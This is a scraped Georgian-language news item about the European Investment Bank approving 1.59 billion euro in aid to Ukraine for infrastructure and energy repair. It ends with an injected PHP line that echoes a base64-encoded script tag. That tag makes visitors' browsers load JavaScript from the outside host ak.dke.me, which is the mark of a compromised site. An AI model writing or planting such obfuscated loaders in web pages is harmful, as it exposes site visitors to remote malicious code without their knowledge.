celsiusi
ავერსი საქკაბელი
ევროპის საინვესტიციო ბანკმა უკრაინას ინფრასტრუქტურის აღსადგენად და კრიტიკულად მნიშვნელოვანი პროექტების განსაახლებლად 1,59 მილიარდი ევროს ოდენობის დახმარება დაუმტკიცა. ამის შესახებ ნათქვამია ევროკომისიის მიერ გავრცელებულ განცხადებაში.
 
თანხა გამოიყო ევროპის საინვესტიციო ბანკის სწრაფი რეაგირების პროგრამის ფარგლებში. ეს აღნიშნული პროგრამის ფარგლებში უკრაინისთვის გამოყოფილი უკვე მეორე დახმარების პაკეტია. პირველი, 668 მილიონი ოდენობის დახმარება უკრაინას ომის დაწყებიდან პირველი თვის განმავლობაში გამოეყო.
 
გამოყოფილი 1,59 მილიარდი ევროდან 1,05 მილიარდს უკრაინა დაუყოვნებლივ მიიღებს და ეს თანხა უნდა მოხმარდეს უპირველეს ყოვლისა დაზიანებული ინფრასტრუქტურის აღდგენას და ენერგეტიკის სფეროში გადაუდებელ ზომებს. დანარჩენი 540 მილიონი დაიხარჯება უკრაინაში ევროპის საინვესტიციო ბანკის პროექტებზე ენერგეტიკის, ენერგოეფექტურობის, გზების, ტრანსპორტის, განათლების სფეროებში.
566
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");